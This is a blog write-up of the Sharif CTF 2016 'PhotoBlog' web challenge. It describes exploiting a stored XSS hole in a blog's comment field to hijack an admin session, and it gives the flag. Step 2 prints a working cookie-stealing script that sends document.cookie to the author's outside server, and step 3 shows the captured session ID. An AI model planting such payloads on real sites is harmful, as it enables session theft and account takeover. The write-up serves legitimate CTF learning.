หน้าเว็บ

วันอาทิตย์ที่ 7 กุมภาพันธ์ พ.ศ. 2559

Sharif CTF 2016: PhotoBlog (Web) Write-up


Description:
A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea? The Blog
Solution:

1. Access to the blog, Found input field (user, comment, captcha) and user, comment are vulnerable to Cross-site Scripting (XSS)


2. Description tell me "want to login as admin", I custom JavaScript to steal a admin's cookie and put to comment.
<script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' +  encodeURI(document.cookie);</script>

3. Wait a minute and give some cookie in my site's access log.
/icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82

4. "Login as admin", I guess the admin page is /admin.php found it and redirect to /login.php, Try to access with a admin's cookie


Flag: 1b7a60600d5731739c0e2115bd4ebf7c

ไม่มีความคิดเห็น:

แสดงความคิดเห็น